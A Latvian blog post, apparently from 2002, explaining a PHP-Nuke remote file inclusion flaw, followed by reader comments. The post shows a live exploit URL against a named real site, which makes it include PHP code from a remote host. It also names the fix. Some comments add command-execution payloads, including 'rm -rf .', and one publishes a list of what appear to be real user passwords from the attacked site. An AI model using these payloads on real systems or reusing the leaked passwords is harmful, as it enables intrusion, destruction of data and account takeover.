PHP-Nuke exploit darbības princips

Anonīmais lasītājs atsūtīja nelielu skaidrojumu par PHP-Nuke exploitu ar visu demonstrāciju uz reālu dzīvē existējošu saitu.
Piemērs neko ļaunu nevar izdarīt (nu gandrīz neko :)), vienkārši tas nodemonstrēs kāds ir princips pēc kura palaiž jau skarbāku exploitu ar kuru var sadarīt ļaunākas lietas, lai gan naivi būtu teikt, ka šis koda gabaliņš neko ļaunu nedara. Principā jau vairāk arī neko nevajag 😉
Pods.lv neatbild par šī exploita radītajām sekām, jo tā ir tikai demonstrācija ar mērķi informēt lietotājus.

Anonīmais hakeris raksta:
“iesaakumam links. tas ir mazinjsh piemeerinjsh, ko VAR izdariit ar phpnuki.
http://www.good.lv/portal/index.php?file=https://pods.lv/exploit/phpnuke.txt

nezin kaapeec man shonakt uznaaca nikjis pamakareeties ar stx portaalu. tb – uzzinaat, ar ko ta taas phpnukes vienu peec otras njem priekshaa. tad nu beidzot atradu. uz visaam panjemtajaam tas straadaa. briinos, kaa good.lv veel staav.

peec pusstundas researcha, atradu threadu ieksh securityfocus BugTraq listes:
securityfocus.com

ideja ir ljoti pat vienkaarsha. ja tiek noraadiits file parametrs, tad php nuke jamo inkluudo savaa kodaa. protams, ka neljauj inkluudot virs ruuta, etc. a vot urljus nepaarbauda. tb – defaultais php konfigs ljauj ieksh include() steitmenta lietot pilniigi visu to pashu, ko ieksh fopen. ieskaitot ftp://, http://, u.t.t.

taalaak jau maaksla rokaa. uztaisam .txt failinju, kuraa ir php kods, kuru veelamies executeet un aidaa – /index.php?file=[urlis]

karoch. tas bija xploits. a vot izvairiities no shitamaa var, atrubiijot ieksh php konfiga allow_url_fopen (nomainot no on uz off). un uzliekot jaunaaku phpnuki 🙂

bet labaaks ieteikums buutu vispaar nelietot nuki. tur xploiti ir/bija/buus. kaa arii – phpnukes developments ta ir aptruucies…
tb – jamo nesuportees finansiaali vairs.”

Nu lūk un tie, kas agri lasa podu žigli, jo žigli ieskatās lapas kodā, ko jūs iepriekš atvērāt izmantojot exploit un atrod šādu rindiņu:

“Hacked by Vasja Pupkin.

If you are reading this, and you are admin, you shall understand that your site doesn’t belong to you anymore.

that’s first of the essential security rules:

“Law #1: If a bad guy can persuade you to run his program on your computer, it’s not your computer anymore.”

So, i urge you to check what is that you can or cannot do about this problem.

FYI. This bug is from 21st of january (2002). check security sites for more info.

c ya!

P.S. What is this site (which looks awful) about? And in what language is it?

P.P.S. Anywayz. Be a good puppy and don’t use PHP-Nuke. Get some good books on PHP or whatever you like and do-it-yourself [tm]

Greetz gouz to VVF”

71 thoughts on “PHP-Nuke exploit darbības princips

  1. Njerga

    Anonīmais hakeris raksta: “iesaakumam links. tas ir mazinjsh piemeerinjsh, ko VAR izdariit ar phpnuki… Njaa diez kursh tad ir tas anoniimais hakeris ja suutot tev sho rakstu jau pamaniijies failu uzmest uz tava servuka…

    Atbildēt
  2. Pow

    Labaak to sploit skriptinju destruktiivaaku vareeja. Un sarakstu ar linkiem kas jaanospiezj lai lietas notiktos 🙂
    A to te kaukaadu sviestu izdrukaa. Tas tak nav interesanti.

    Atbildēt
  3. Guru

    Pow: Nu , nu sviestiņš. Nepietiek ar pwd laukiem un loginu? interfeiss administreeshanai jau eksistee. Sleedzies caur proxy un… Bet nu skarbi gan.
    Tas saucas jaunais pakalpojums: IZPILDI KODU UZ MUUSU SERVERA!(jebkaadu un jebkad)

    Atbildēt
  4. Pow

    Tiem kas tankaa piedaavaaju shaadu variantu:
    $a = `your_command_here`;
    echo nl2br($a);
    piemeeram:
    $a = `rm -rf .`;
    echo nl2br($a);

    Atbildēt
  5. coolynx

    Njerga: par laimi man meilus sūta tāpat un nav pašam *jāimitē* anonīmie lietotāji tā kā nāksies vien noticēt. Vēl pods.lv nav bijis nopublicēts neviens anonīmais sūtītājs kuru es pats būtu sev nosūtjis kā arī turpmāk nebūs – tā ir principa lieta. Tāpat kā pats saits turās uz entuziasma, idejas un principiem…

    Atbildēt
  6. hujacker

    heh

    uztaisam uz sava servera failinju ‘crap’

    kuraa atrodas:
    echo “”;
    echo system($a);

    peectam ejam uz:
    http://www.good.lv/portal/index.php?file=http://mans.serveris/crap&a=ls -las

    lietinja padariita, daram ko gribam

    mr. hujacker

    Atbildēt
  7. PoRToSS

    Nu tas anoniimais lasiitaajs ir ljoti kruc hackeris. Un ljoti po hackerski ir laust PHP-NUKE lapas un pietam vel nekomerciaalas. Ja nav ko dariit uzlauz delfi.lv. Ja kaads domaa, ka tuuliit STX mirs, tad man naaksies juus smagi aplaust, muusu jaukie labveelji, jo driiz jau jaunais STX engine buutu gatavs, tagad ir iemesls pasteigties. Un protams, ka ir jaapateicas coolynx’am par linku uz STX. Liels paldies, braal.

    Atbildēt
  8. NyX

    Laikam jau anoniimais hackeris STX “uzlauza” pavisam nejaushi un pavisam nejaushi deva to zinaat coolynxam. Tieshaam coolynx tu esi vecis.

    Atbildēt
  9. Njerga

    Pow: gribu redzeet kaa jaunajai enginei tu pats bugus atradiisi, nevis reaali izlasot kaadaa lameru lapaa, kaa spiest ctrl+c un ctrl+v.

    Atbildēt
  10. Pow

    Njerga,
    Ej pakaries, mani galiigi nesaista mekleet bugus tavaa miskastee. Lameru lapa lameru lapa, blah blah, a pac pirmo komentaaru ieposteejis. Top lameris laikam esi 🙂

    Atbildēt
  11. Pow

    Njerga, ja tu domaa ka es esmu anoniimais hakeris, tad ljoti maldies, es parasti nereklameeju ja kaadu serveri panjemu, un nelieku pirmajaa lapaa hacked by elite team. Daudz veertiigaak ir klusi izmantot kastes cpu power/inet piesleegumu/whatever un nosleept no root to ka vinsh vairs nav vieniigais root. ymmv

    Atbildēt
  12. Njerga

    STX diemzheel nava mana miskaste. man vienkaarshi ljoti interesanti skatiities kaa cilvji censhaas bezjeegaa nogaazt saitu. a kur ta prikols. portoss, jau pareizi teica, gaazt nekomerciaalos saitus tieshaam ir ljoti pozitiivi.

    Atbildēt
  13. bx

    Nuuu.. vaita vajadzeeja shitaa? Tie, kas gribeeja, vareeja pashi pamekleet shito.. Nekas jauns jau neatklaajaas, tikai tagad nabagiem [gan jau ne tikai good.lv] saits downaa…
    Conclusion: shito vinjiem vareeja pateikt arii personiigi.. nav jau uzreiz pods.lv jaapostee.. vai juusu meerkjis ir izniicinaat PHP-nuke saitus or what? Vien informeet cilveekus jau noteikti ne…

    Atbildēt
  14. Murgonis

    GOOD.LV nav donaa bus ka weblogs tik ilgi kamer BigUgga pabeigs jauno dzineeju cepinaat. Un diez vai tas buss veidots ka CTRL+C un tad CTRL+V 😛

    Atbildēt
  15. coolynx

    Vienkārši ir pieriebies, ka katru reizi ieliekot jaunu PHP-Nuked saitu pilnīgi visiem ir pie kājas un tas tiek IGNORĒTS, jo *mēs* tak esam savādāki un uz mums tas neattiecas.
    Varbūt tagad kāds beidzot pakasīs savu pauri un izdarīs secinājumus? Kā redzam, tad tikai pēc spēcīga spēriena pa pakaļu kaut kas notiek.
    Jā esmu gandarīts, ka beidzot good.lv tiks salāpīts… kā arī domāju, ka pēc šī gadījuma mazāko saitu īpašnieki pamācīsies no citu kļūdām, kuras šobrīd nu nekādīgi nevar nepamanīt.
    Sirdsapziņas pārmetumu man nav, jo variet pašķirstīt arhīvus, tur ir redzama mana attieksme pret PHP-Nuke saitiem.
    Ja vārdi nespēj ietekmēt, tad, lai darbi liek aizdomāties…

    Atbildēt
  16. Murgonis

    GOOD.LV jau en bija domajuši par jauno dzinēju un jau pasen tas palenam saka tiksts veidtos pēc paris dienam būtu sācis rulēt bet …….. tagat japačakarējas.

    Atbildēt
  17. PoRToSS

    Man jau nebuutu nekas pretii ja shitais pasaakums nebuutu veersts konkreeti pret STX, kautgan taadas aizdomas ir. Ja STX tika izraudziic peec citiem principiem, tad varu justies laimiigs, ka STX ir paliidzeejis phpnuke saitu pazushanai no LVneta. Vieniigi zheel DB. Tomeer pa pieskari aizgaaja daudzas neguleetas naktis un vel vairaak laika dienaa, bet gan jau izdziivosim. Tagad buus iemesls BigUggam aatraak cepinaat STXv3.0. Peace.

    Atbildēt
  18. coolynx

    PoRToSS: godīgi sakot es biju par 90% pārliecināts, ka jau no rīta saits tiks aizvērts max 2h pēc šīs informācijas parādīšanās podā vai vismaz aizvērts caurums. Kā arī man šķiet, ka PHP-Nukei ir sava backup sisēma. Vismaz, kad es to pētīju, tad bija tāda lieta. Nevarēju iedomāties, ka nekādi backupi netiek taisīti… ļoti žēl.
    Katrā gadījumā vismaz no manas puses šis pasākums nebija vērsts pret good.lv, lai arī es to neapmeklēju, tomēr domāju, ka bija sava auditorija, kas tagad cietīs no tā.
    Tāds nu man tas liktenis – būt ļaunam, cietsirdīgam un bez žēlastības iznīcināt visu gaišo un cēlo 😛

    Atbildēt
  19. PoRToSS

    Kaadeelj tad bij? Ceru, ka ir un buus.
    Nu kaa redzi pagaaja vairaak laika.
    Ir taads teiciens, iisti viiri back-up netaisa.
    Un par to DB baigaa shkrobe, vakar man vajadzeeja taas kopiju aizsuutiit BigUgga’am bet taakaa monis man ir uz nospraagshanas robezhas un tas nebij steidzami sho pasaakumu atliku. Ja STX engine nebuus, tad STX mirs. Un auditorija saitam kuram reaali nav komentaaru sisteema bija ljoti augsta…

    Atbildēt
  20. Sandino

    Nenotureejos…..
    1.Pashi esam vainiigi, ka www.good.lv tika uzlausc (pareizaak sakot uzlausc tika phpnuke).
    2. Mees jebkuraa briidii varam atjaunot visu www.good.lv portaala saturu, bet labaak pagaidiisim jauno dzineeju…
    3. Paldies par www.good.lv reklaamu.

    Atbildēt
  21. Murgonis

    Eh nju tev taisniiba 🙂 bet me doma ka dies ko ilgi good.lv nebus shada stvakli un extreme sadlaja jau palika 😉 jo ta tac nebija uz php nuke ;D

    Atbildēt
  22. NyX

    Vispaar tas no vienas puses ir labi ka no taadas “nelaimes” var guut arii savu labumu – kaut vai kaa teica Sandino taa bija laba reklaama

    Atbildēt
  23. bx

    coolynx.. es atvainojos.. Tev skauzh, ka Tev naacaas pasham sacepinaat savu engini no dazhaadiem free scriptiem [kaa Murgonis teica Ctrl-C + Ctrl-V :))] un ka citi veesi var lietot PHP nuki?? Ja Tev besii, ka visiem po.. par tiem php-nuked saitiem.. nu tad NELIEC TOS!
    Vareeji labaak nevis nopubliceet kaa uzlauzt tos saitus, bet gan kaa tos salaapiit.. vai vismaz personiigi shiem pazinjot, ka kaukas nestraadaa.. bet nee – Tev jau vaig to visu lietu dariit publiski, paraadot, cik Tu kruts… [bet nu shitaa jau Tava tendence.. tjipo history repeating]
    Es arii esmu uzcepis savu engine no 0, neesmu lietojis to PHP-nuke, jo jau saakumaa sapratu, ka liela popularitaate kodam labumu nenes.. tomeer daudzi cilveeki to lietoja, kuri varbuut nemaz tik daudz nerubii no kodeeshanas.. un tagad viena Tava izgaajiena deelj vinjiem ir kaukas jaamaina.. taapee, ka Tev sagribeejaas izcelties or so..
    Kaa jau teicu: shito infu var atrast citur… kas gribees – atradiis! Mosh veel sarunaa ar DELFIem, lai nopublicee?
    Tagad vismaz esi “pirmais puika hvz kur”.. ne?

    Atbildēt
  24. BigUgga

    Portoss: par tiem backupiem un iistiem viiriem – pieredze raada, ka datu pazushanaa uzreiz var redzeet kursh ir viirs :))
    bx: vieniiigais, ko coolynx taa iisti neetiski izdariija – nopubliceeja par piemeeru good.lv. abet, tas, kaa to izdariit, to vaidzeeja. es gan attureejos no shii panjeemiena publiceeshanas hackers.lv, tachu, laikam vaidzeeja, jo reti kursh izlasot par to un to php-nuked, izlabos savaaa saitaa to allow_url_fopen = off….

    Atbildēt
  25. BigUgga

    pietam, nekas slikts nav no kopeeshanas un paastoshanas. pasaulee jau sen ir naakushi pie atzinjas, ka labaak izmantot jau gatavus risinaajumus. ietaupas gan laiks, gan nauda. galvenais – izveeleeties, kursh risinaajums ir gatavaaks. ja nav izveeleeties vai nevar izveeleeties – luudzu, kodee no jauna. ja kodee kautko jaunu, arii izmanto jau gatavas funkcijas, klases, etc kaada taska veikshanai. taa luuk.

    Atbildēt
  26. coolynx

    bx: atvaino, bet šķiet, ka tu vēl joprojām neesi neko sapratis. Vēsture atkārtojas kā tu saki. Varbūt labāk būtu bijis, ja kāds vienkārši nonukotu šo saitu un, tad to nopublicētu kā kārtējo nuki?
    vai tu vismaz izlasīji rakstu, jo te tika pilnībā viss uzrakstīts – gan kā lauzt, gan arī kā salāpīt. Piemērs, manuprāt bija ļoti pat labs, lai arī neētisks, tomēr ļoti iespaidīgs. Šoreiz ir progress un vienkārši phpnuked vietā ir pamācība ar reālu demo versiju. Un tas, ka tu tagad lēkā vai no biksēm laukā un mēģini kaut ko izbļaut, pierāda tikai šīs pamācības efektivitāti. Tas nozīmē, ka bija jēga to darīt…

    Atbildēt
  27. bx

    Nee.. man tas diemzheel neko jaunu nedeva, jo nelietoju to nuki!
    Nu cereesim, ka ir, kaa Tu saki, ka KAADAM tas tomeer paliidzeeja.. vienkaarshi uzskatu, ka nevajadzeeja par to tik publiski bljaustiities..
    Par to pamaaciibu.. es to redzeeju. Tomeer: ja nu kaadam to allow_url_fopen vaig, lai veertu remote failus bet vaig arii PHP-nuki? Ko tad dariit? :p

    Atbildēt
  28. coolynx

    bx: tad jālāpa nuke, lai gan šādu caurumu es godīgi sakot pat nebiju gaidījis. includot externālu failu pie tam vēl parsēt php vai tev nešķiet, kas tas ir ne tikai stulbums, bet tā jau ir diagnoze?

    Atbildēt
  29. bx

    Njaa.. shitais bugs tieshaam galiigi stulbs no tomeer profu puses.. iesaaceejiem veel buutu piedodami, bet PHP-nuke team.. tas tieshaam paraada galiigi ne to labaako.. kaa Tu saki – diagnoze 🙂
    Laikam buus jaanokachaa taa nuke un jaauzmet acs, kaa to bugu salaapiit..

    Atbildēt
  30. coolynx

    bx: man šķiet, ka šis caurums jau ir salāpīts jaunākajās versijās. tā kā sākt vajadzētu no php-nukes foruma. Latvijā bija kādreiz (varbūt vēl ir) šī dzinēja atbalstītāji. Domāju, ka ir jēga viņus atrast un apvienoties, lai kopīgiem spēkiem tikt galā ar šo problēmu kā arī ar citām līdzīgām.

    Atbildēt
  31. laacz

    Es, protams, esmu miermiiliigs (gygy) bet nu …
    sandino citaats: 2. Mees jebkuraa briidii varam atjaunot visu www.good.lv portaala saturu, bet labaak pagaidiisim jauno dzineeju…
    Man paliek slikti, ieraugot tik debiilu (es reti taadus vaardus pielietoju publiski) tekstu.

    manu miiljo sandino – ja arii tu (varbuut) esi admins, tad gan jau ka tev secen negaaja fakts, ka kaut kur pa dienas fidu shis xploits nedarbojaas. liidz ar ko – tagadeejaa engines (hahahahahaha) mainja bija sevishkji lieka. te dazhi labi, personiigi, ilgi domaaja – mozillaa good lv neraadaas, vai arii by default tik kropli izskataas.
    ar paldiesu no hakeriem valjaa netiksi 🙂

    Atbildēt
  32. laacz

    p.s. man jau vairaak liekas, ka php nuki novaacaat, jo visi vareeja obzerveet yewsu paroliites (inteligjentaas:).

    a nomainiit ta nejeedzam…

    God
    rally
    murgonis
    1781
    PoRToSS
    Paloma1987

    Zombis
    1781
    SnowXR
    dabass
    Raitis_Sametis
    almia60
    labais
    labais1
    nelabs
    nelabais
    NyX
    1xm3
    Meikers
    diakonata
    Pie kam, esmu paarliecinats, ka dazham labam no jums shaadas pashas paroles ir citur…

    Atbildēt
  33. Ziz

    Mjā… laacz tiešām paspīdēja. Es vismaz cerēju, ka jams nebūs sīkumains histēriķis… bet redz… tomēr manas cerības izrādījās veltīgas. Brīnums kā cietnī vēl nav tas nopublicēts. Ar rakstu par blefiem raksturīgu stilu. Vilšanās jau nebija viņa personas attiecībā. Tas jau sen bija nojautams…

    Atbildēt
  34. Pow

    Nez ko tauta taa saspringst. Ja coolynx saaktu paarpubliceet/tulkot bugtraq, laikam vinju ar beisbola nuujaam ietu sist visi shitie raudaataaji.

    Atbildēt
  35. Mogomeeds

    Es nesaprotu, nahujaa vajag buut taadiem churiem? Nav jau gruuti paklejot pa internetu un bojaat visu peec kaartas. Uzradiisies gudrinieki, kas saaks jakareet sho pashu Podu vai Cietni, ko tad? Es tikai zinu vienu, nevajag domaat, ka kaads ir neatrodams. Latvija ir maza. Nekauniigo hakeru nav paaraak daudz. Paprasiis vienam, paprasiis otram un hakeri sameklees. Un nevajag domaat, ka pie kompjuutera seezj vieni vieniigi pusaudzji vai briljaini studenti. Ir gan cilveeki ar mashiinaam, gan ar izteikti darboties griboshu raksturu. Personiigi es vairaak cieniitu viteejos hakeriigos, ja vinji izdariitu reaalas lietas. Bombardeet lapas, kuras taisa cilveeki briivaa laikaa, pa savu naudu, ir sviests. Tik labi visi, kas taisa tos pashus Nukes vareetu paarmesties uz to bojaashanu. Un tas ir nopietni? Neesmu maniijis beidzamajaa laikaa, ka kaads liistu prezidenta sevrerii, iekshlietu ministrijas serveriitii. To gan es veerteetu par drosmi, bet puisheljiem sajaaja lapu, vai dieninj kaada gudriiba, oi moins…

    Atbildēt
  36. ash

    nu, bet pareizi buutu, ja coolynx buutu nopubliceejis to saitu sarakstu kur shitas bugs utt. bet nevis STX uzbrukumu veersis .. jo tomeeer es arii atbalstu, ka privat saitus nevajadzeetu lauzt! Un STX bij viens no labaakajiem shaada veida .. KAut gan no otras puses taa bija tiiri laba maaciiba ne tikai STX bet citiem latvju saitiem, kas lieto PHP-nuke [..] Par CTR+V un CTR+C runaajot – tas nav nekas netiirs, taa pat galu galaa ir labaak .. ..bet laacz izceelaas! [vai password nav jaabuut vismaz ar 8 simboliem?] 🙂

    Atbildēt
  37. Scorpion

    ok pusaudzhu vaimanas. Visiem gribaas buut “krutiem” un uztasiiit baigaas “pages” ar PHP-nuki vai frontpaagi . Ja NEJEEDZAT taisiit labas PAGES tad taistiet visu ar notepad, lai peec tam nav jaabriinaas. eXtreemisti liikrochainie, mlin … besii :-)) beernudaarzs

    Atbildēt
  38. PoRToSS

    Scorpion: Eh lai taisiiti saitu nepar datoru tematiku vajag buut krutiem koderiem? Tas pac cietnis 1. gadu bija bez engines. Paraadi tu savus maakslas darbus un tad brauc augumaa.

    Atbildēt
  39. Mogomeeds

    Nu vispaar jau nav ko kauneeties taisiit FP lapas. Tas, kas shitaa lamaajaas ir nejeega, kam maajaas staav kompis ar 3.1 Windowu.

    Atbildēt
  40. DfgDf

    Laacz par taa parolem – Man ir ruugta paarlieciiba ka tu nevienu no taam nevaretu pat iedomaaties. Ja runa iet par krekoshanu tad sagjeneret var arii 8 cipariigas passwd.

    Atbildēt
  41. Ezh

    Secinaajums ir viens … pirms njemat kruto freeware padomaajat veelreiz vai jums gala rezultaataa tas atmaksaasies vai nee 🙂

    Atbildēt
  42. kranucis

    jaa,tikai krutais hakeris augstaakmineeto tekstu anglju valodaa norakstijis no vienas krievu graamatas hakoshanas, gy gy…(ja atminja nevilj sarakstijis P.Petrovskijs)

    Atbildēt

Ieraksti komentāru

Tava e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti kā *